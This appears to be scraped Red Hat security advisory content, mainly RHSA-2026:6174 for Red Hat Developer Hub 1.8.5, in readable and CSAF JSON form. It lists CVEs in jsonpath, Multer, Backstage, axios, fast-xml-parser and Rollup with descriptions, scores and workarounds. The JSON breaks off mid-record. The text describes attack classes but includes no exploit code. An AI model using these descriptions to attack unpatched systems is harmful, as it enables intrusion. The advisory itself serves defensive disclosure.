"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability"
}
]
}
RHSA-2026:6174
Vulnerability from csaf_redhat - Published: 2026-03-30 12:51 - Updated: 2026-04-08 19:51Summary
Red Hat Security Advisory: Red Hat Developer Hub 1.8.5 release.
Severity
Important
Notes
Topic: Red Hat Developer Hub 1.8.5 has been released.
Details: Red Hat Developer Hub (RHDH) is Red Hat's enterprise-grade, self-managed, customizable developer portal based on Backstage.io. RHDH is supported on OpenShift and other major Kubernetes clusters (AKS, EKS, GKE). The core features of RHDH include a single pane of glass, a centralized software catalog, self-service via golden path templates, and Tech Docs. RHDH is extensible by plugins.
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in jsonpath. The `value` function is vulnerable to Prototype Pollution, a type of vulnerability that allows an attacker to inject or modify properties of an object's prototype. This can lead to various impacts, including arbitrary code execution, privilege escalation, or denial of service (DoS).
8.8 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6174
A flaw was found in the jsonpath component. This vulnerability allows a remote attacker to achieve arbitrary code execution by supplying a malicious JSON Path expression. The component's reliance on the `static-eval` module for processing user-supplied input leads to unsafe evaluation. Successful exploitation can result in Remote Code Execution (RCE) in Node.js environments or Cross-site Scripting (XSS) in browser contexts.
9.8 (Critical)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6174
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.
A flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can exploit this vulnerability by intentionally dropping a connection during a file upload. This can lead to a Denial of Service (DoS) due to resource exhaustion on the affected system.
7.5 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6174
A flaw was found in Multer, a Node.js middleware. A remote attacker could exploit this vulnerability by sending specially crafted malformed requests. This could lead to resource exhaustion, resulting in a Denial of Service (DoS) for the application using Multer.
7.5 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6174
A denial of service flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can send specially crafted malformed requests which may induce a stack overflow. This can lead to a Denial of Service (DoS) making the service unavailable.
7.5 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6174
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A flaw was found in Backstage. A symlink-based path traversal issue can be exploited in multiple Scaffolder actions and archive extraction utilities during template execution via malicious symlinks. An attacker with access to create and execute Scaffolder templates can read sensitive files, delete arbitrary files or write files outside the intended workspace, resulting in unauthorized information disclosure or system compromise.
9.1 (Critical)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6174
Workaround
To mitigate this issue, consider implementing strict access controls for Backstage Scaffolder templates. Restrict the ability to create and execute Scaffolder templates to trusted users only, utilizing the Backstage permissions framework. Additionally, audit existing templates for any symlink usage and consider running Backstage within a containerized environment with a highly restricted filesystem to limit potential impact.
A code injection flaw has been discovered in the npm @backstage/plugin-techdocs-node library. When TechDocs is configured with `runIn: local`, a malicious actor who can submit or modify a repository's `mkdocs.yml` file can execute arbitrary Python code on the TechDocs build server via MkDocs hooks configuration.
7.7 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6174
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
7.5 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6174
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted XML input. The system incorrectly interprets a dot in a DOCTYPE entity name as a regular expression wildcard during processing. This allows the attacker to bypass security measures and inject malicious scripts, resulting in Cross-Site Scripting (XSS) when the parsed output is displayed to users.
7.1 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6174
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A denial of service flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted, small XML input. This input can force the XML parser to perform an unlimited amount of entity expansion, consuming excessive resources. This can lead to the application freezing for an extended period, resulting in a Denial of Service (DoS).
7.5 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6174
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.
9.1 (Critical)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6174
A flaw was found in fast-xml-parser. A user can exploit this flaw by processing specially crafted XML data with the XML builder when the `preserveOrder` option is enabled. This can lead to a stack overflow, causing the application to crash and resulting in a Denial of Service (DoS).
7.5 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6174
Workaround
To mitigate this vulnerability, configure applications using the `fast-xml-parser` XML builder to set the `preserveOrder` option to `false`. Alternatively, ensure that all XML input data is thoroughly validated before being passed to the builder to prevent the processing of malicious or malformed content.
References
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Developer Hub 1.8.5 has been released.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Developer Hub (RHDH) is Red Hat\u0027s enterprise-grade, self-managed, customizable developer portal based on Backstage.io. RHDH is supported on OpenShift and other major Kubernetes clusters (AKS, EKS, GKE). The core features of RHDH include a single pane of glass, a centralized software catalog, self-service via golden path templates, and Tech Docs. RHDH is extensible by plugins.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:6174",
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61140",
"url": "https://access.redhat.com/security/cve/CVE-2025-61140"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-1615",
"url": "https://access.redhat.com/security/cve/CVE-2026-1615"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-2359",
"url": "https://access.redhat.com/security/cve/CVE-2026-2359"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-24046",
"url": "https://access.redhat.com/security/cve/CVE-2026-24046"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25153",
"url": "https://access.redhat.com/security/cve/CVE-2026-25153"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25896",
"url": "https://access.redhat.com/security/cve/CVE-2026-25896"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26278",
"url": "https://access.redhat.com/security/cve/CVE-2026-26278"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27606",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27942",
"url": "https://access.redhat.com/security/cve/CVE-2026-27942"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-3304",
"url": "https://access.redhat.com/security/cve/CVE-2026-3304"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-3520",
"url": "https://access.redhat.com/security/cve/CVE-2026-3520"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh",
"url": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh"
},
{
"category": "external",
"summary": "https://developers.redhat.com/rhdh/overview",
"url": "https://developers.redhat.com/rhdh/overview"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_developer_hub",
"url": "https://docs.redhat.com/en/documentation/red_hat_developer_hub"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-11518",
"url": "https://issues.redhat.com/browse/RHIDP-11518"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-11639",
"url": "https://issues.redhat.com/browse/RHIDP-11639"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-11731",
"url": "https://issues.redhat.com/browse/RHIDP-11731"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12108",
"url": "https://issues.redhat.com/browse/RHIDP-12108"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12139",
"url": "https://issues.redhat.com/browse/RHIDP-12139"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12323",
"url": "https://issues.redhat.com/browse/RHIDP-12323"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12335",
"url": "https://issues.redhat.com/browse/RHIDP-12335"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12392",
"url": "https://issues.redhat.com/browse/RHIDP-12392"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12417",
"url": "https://issues.redhat.com/browse/RHIDP-12417"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12444",
"url": "https://issues.redhat.com/browse/RHIDP-12444"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12447",
"url": "https://issues.redhat.com/browse/RHIDP-12447"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-12480",
"url": "https://issues.redhat.com/browse/RHIDP-12480"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6174.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Developer Hub 1.8.5 release.",
"tracking": {
"current_release_date": "2026-04-08T19:51:09+00:00",
"generator": {
"date": "2026-04-08T19:51:09+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:6174",
"initial_release_date": "2026-03-30T12:51:47+00:00",
"revision_history": [
{
"date": "2026-03-30T12:51:47+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-30T12:51:49+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-08T19:51:09+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Developer Hub 1.8",
"product": {
"name": "Red Hat Developer Hub 1.8",
"product_id": "Red Hat Developer Hub 1.8",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhdh:1.8::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Developer Hub"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-hub-rhel9@sha256%3A2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1774545605"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-rhel9-operator@sha256%3A72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1774544220"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-operator-bundle@sha256%3A400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7?arch=amd64\u0026repository_url=registry.redhat.io/rhdh\u0026tag=1774549552"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64 as a component of Red Hat Developer Hub 1.8",
"product_id": "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64 as a component of Red Hat Developer Hub 1.8",
"product_id": "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64 as a component of Red Hat Developer Hub 1.8",
"product_id": "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.8"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61140",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2026-01-28T17:00:46.678419+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2433946"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in jsonpath. The `value` function is vulnerable to Prototype Pollution, a type of vulnerability that allows an attacker to inject or modify properties of an object\u0027s prototype. This can lead to various impacts, including arbitrary code execution, privilege escalation, or denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsonpath: jsonpath: Prototype Pollution vulnerability in the value function",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61140"
},
{
"category": "external",
"summary": "RHBZ#2433946",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433946"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61140",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61140"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61140",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61140"
},
{
"category": "external",
"summary": "https://gist.github.com/Dremig/8105c189774217222a8ebea3ed4d341d",
"url": "https://gist.github.com/Dremig/8105c189774217222a8ebea3ed4d341d"
},
{
"category": "external",
"summary": "https://github.com/dchester/jsonpath",
"url": "https://github.com/dchester/jsonpath"
}
],
"release_date": "2026-01-28T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jsonpath: jsonpath: Prototype Pollution vulnerability in the value function"
},
{
"cve": "CVE-2026-1615",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2026-02-09T11:10:57.572082+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437875"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the jsonpath component. This vulnerability allows a remote attacker to achieve arbitrary code execution by supplying a malicious JSON Path expression. The component\u0027s reliance on the `static-eval` module for processing user-supplied input leads to unsafe evaluation. Successful exploitation can result in Remote Code Execution (RCE) in Node.js environments or Cross-site Scripting (XSS) in browser contexts.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsonpath: jsonpath: Arbitrary Code Execution via unsafe JSON Path expression evaluation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Product Security team has rated this vulnerability as Important as it may allows arbitrary code execution when processing untrusted JSON Path expressions. This can lead to Remote Code Execution in Node.js environments or Cross-site Scripting in browser contexts. In some contexts it may be possible to remotely exploit this flaw without any privileges. However, within Red Hat products the jsonpath component is used as a transitive dependency or does not directly handle user input. This context reduces exposure and criticality of this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-1615"
},
{
"category": "external",
"summary": "RHBZ#2437875",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437875"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-1615",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1615"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1615",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1615"
},
{
"category": "external",
"summary": "https://github.com/dchester/jsonpath/blob/c1dd8ec74034fb0375233abb5fdbec51ac317b4b/lib/handlers.js%23L243",
"url": "https://github.com/dchester/jsonpath/blob/c1dd8ec74034fb0375233abb5fdbec51ac317b4b/lib/handlers.js%23L243"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-15141219",
"url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-15141219"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-JSONPATH-13645034",
"url": "https://security.snyk.io/vuln/SNYK-JS-JSONPATH-13645034"
}
],
"release_date": "2026-02-09T05:00:09.050000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "workaround",
